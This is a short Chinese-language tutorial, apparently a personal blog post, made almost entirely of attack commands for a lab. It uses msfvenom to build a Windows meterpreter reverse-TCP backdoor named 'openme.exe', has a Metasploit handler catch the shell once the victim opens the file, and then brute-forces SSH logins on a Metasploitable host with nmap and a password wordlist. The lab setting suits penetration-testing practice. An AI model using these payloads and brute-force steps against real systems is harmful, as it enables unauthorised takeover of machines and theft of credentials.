- A+
一、后门监听
主要步骤:
1、首先在kali上制作一个后门程序。文件名为:openme.exe
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.238.131 LPORT=5050 -f exe -o openme.exe
#本地监听地址及端口号:192.168.238.131:5050
2、为生成的文件 openme.exe 赋予可执行的权限。
命令:chmod 777 openme.exe
3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口
命令:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.238.131
msf exploit(handler) > set lport 5050
4、开始执行渗透攻击并监听
命令:msf exploit(handler) > exploit -z -j
5、在win7系统上打开该文件。
6、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。
你攻陷了别人的主机并拿到了shell,还有session信息。
命令:msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1
meterpreter > shell
7、入侵成功之后可操作win7电脑
输入:netstat ano #列出所有的进程
二、ssh爆破密码
主要步骤:
1.使用Nmap扫描Metasloitable Linux
2 找出开放端口号。
Metasloitable Linux 2 Ip:192.168.238.129
2. 输入nmap –sV –O 192.168.238.129
3.选择攻击模块
Msfconsole
Use auxiliary/scanner/ssh /ssh_login //选择攻击模块
Set rhosts 192.168.238.129 //设置攻击目标ip
Set username msfadmin //设置攻击服务器用户
Set pass_file /root/桌面/password //导入字典
Set threads 50 设置线程
Run //攻击
4.ssh远程连接
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
